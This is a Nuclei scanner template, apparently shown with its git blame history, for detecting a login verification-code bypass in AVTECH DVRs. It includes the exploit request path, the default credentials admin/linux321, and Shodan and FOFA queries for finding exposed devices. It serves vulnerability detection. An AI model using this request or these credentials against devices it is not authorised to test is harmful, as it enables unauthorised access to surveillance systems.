nuclei-templates/http/vulnerabilities/avtech/avtech-verification-bypass....

id: avtech-verification-bypass

info:
  name: AVTECH DVR - Login Verification Code Bypass
  author: ritikchaddha
  severity: low
  description: |
    AVTECH DVR products are  vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"login" product:"Avtech"
    fofa-query: app="AVTECH-视频监控"
  tags: avtech,verify,bypass,iot

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - linux321

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "^0.*\nOK.*"

      - type: dsl
        dsl:
          - status_code == 200
          - len(body) == 5
        condition: and

# digest: 4b0a00483046022100f66dfc80ac1a45755069a731adee572ccf8c2a212a01cf620d518d45127b16f20221009c4b0ba05a989d4e3436f50fedca757ba584308e5fb2a9d4dcf7f810a6111861:922c64590222798bb761d5b6d8e72950
Create avtech-verification-bypass.yaml 2023-05-15 20:22:39 +00:00			`id: avtech-verification-bypass`

			`info:`
			`name: AVTECH DVR - Login Verification Code Bypass`
			`author: ritikchaddha`
			`severity: low`
			`description: \|`
			`AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.`
			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
Create avtech-verification-bypass.yaml 2023-05-15 20:22:39 +00:00			`shodan-query: title:"login" product:"Avtech"`
			`fofa-query: app="AVTECH-视频监控"`
			`tags: avtech,verify,bypass,iot`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"`

added default username and password 2023-05-17 05:10:43 +00:00			`attack: pitchfork`
			`payloads:`
			`username:`
			`- admin`
			`password:`
			`- linux321`

Create avtech-verification-bypass.yaml 2023-05-15 20:22:39 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "^0.\nOK."`

			`- type: dsl`
			`dsl:`
			`- status_code == 200`
			`- len(body) == 5`
			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100f66dfc80ac1a45755069a731adee572ccf8c2a212a01cf620d518d45127b16f20221009c4b0ba05a989d4e3436f50fedca757ba584308e5fb2a9d4dcf7f810a6111861:922c64590222798bb761d5b6d8e72950`